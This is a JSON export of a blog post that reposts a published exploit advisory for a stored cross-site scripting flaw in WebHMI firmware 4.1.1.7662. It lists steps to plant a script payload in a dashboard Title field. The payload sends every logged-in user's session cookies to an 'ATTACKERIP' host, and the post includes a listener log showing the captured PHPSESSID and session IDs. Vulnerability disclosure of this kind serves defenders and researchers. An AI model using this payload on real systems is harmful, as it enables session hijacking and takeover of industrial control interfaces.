{"id":21029,"date":"2022-02-23T18:59:00","date_gmt":"2022-02-23T15:59:00","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166116\/webhmi41-xss.txt"},"modified":"2022-02-26T10:04:44","modified_gmt":"2022-02-26T06:34:44","slug":"webhmi-4-1-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/webhmi-4-1-cross-site-scripting\/","title":{"rendered":"WebHMI 4.1 Cross Site Scripting"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: WebHMI 4.1 &#8211; Stored Cross Site Scripting (XSS) (Authenticated)<br \/>\n# Date: 04\/01\/2022<br \/>\n# Exploit Author: Antonio Cuomo (arkantolo)<br \/>\n# Vendor Homepage: https:\/\/webhmi.com.ua\/en\/<br \/>\n# Version: WebHMI Firmware 4.1.1.7662<br \/>\n# Tested on: WebHMI Firmware 4.1.1.7662<\/p>\n<p dir=\"ltr\">#Steps to Reproduce<\/p>\n<p dir=\"ltr\">1. Login to admin account<\/p>\n<p dir=\"ltr\">2. Add a new register or create new dashboard<br \/>\ninsert payload<\/p>\n<p dir=\"ltr\">&lt;script&gt;var i=new Image;i.src=&#8221;http:\/\/ATTACKERIP\/?&#8221;+document.cookie;&lt;\/script&gt;<\/p>\n<p dir=\"ltr\">in Title field and save.<\/p>\n<p dir=\"ltr\"># A payload saved in the Dashboard section instantly impacts all logged-in users.<\/p>\n<p dir=\"ltr\">#Listener log (the session cookies are readable by script, i.e. they are not set with HttpOnly):<br \/>\nGET \/?PHPSESSID=acaa76374df7418e81460b4a625cb457;%20i18next=en;%20X-WH-SESSION-ID=8a5d6c60bdab0704f32e792bc1d36a6f HTTP\/1.1<br \/>\nHost: 192.168.0.169:8080<br \/>\nConnection: keep-alive<br \/>\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/96.0.4664.110 Safari\/537.36<br \/>\nAccept: image\/avif,image\/webp,image\/apng,image\/svg+xml,image\/*,*\/*;q=0.8<br \/>\nSec-GPC: 1<br \/>\nReferer: http:\/\/192.168.0.153\/<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: WebHMI 4.1 &#8211; Stored Cross Site Scripting (XSS) (Authenticated) # Date: 
04\/01\/2022 # Exploit Author: Antonio Cuomo (arkantolo) # Vendor Homepage: https:\/\/webhmi.com.ua\/en\/ # Version: WebHMI Firmware 4.1.1.7662 # Tested on: WebHMI Firmware 4.1.1.7662 #Steps to Reproduce 1. Login to admin account 2. Add a new register or create new dashboard insert payload &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21029","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21029","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21029"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21029\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21029"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21029"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21029"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}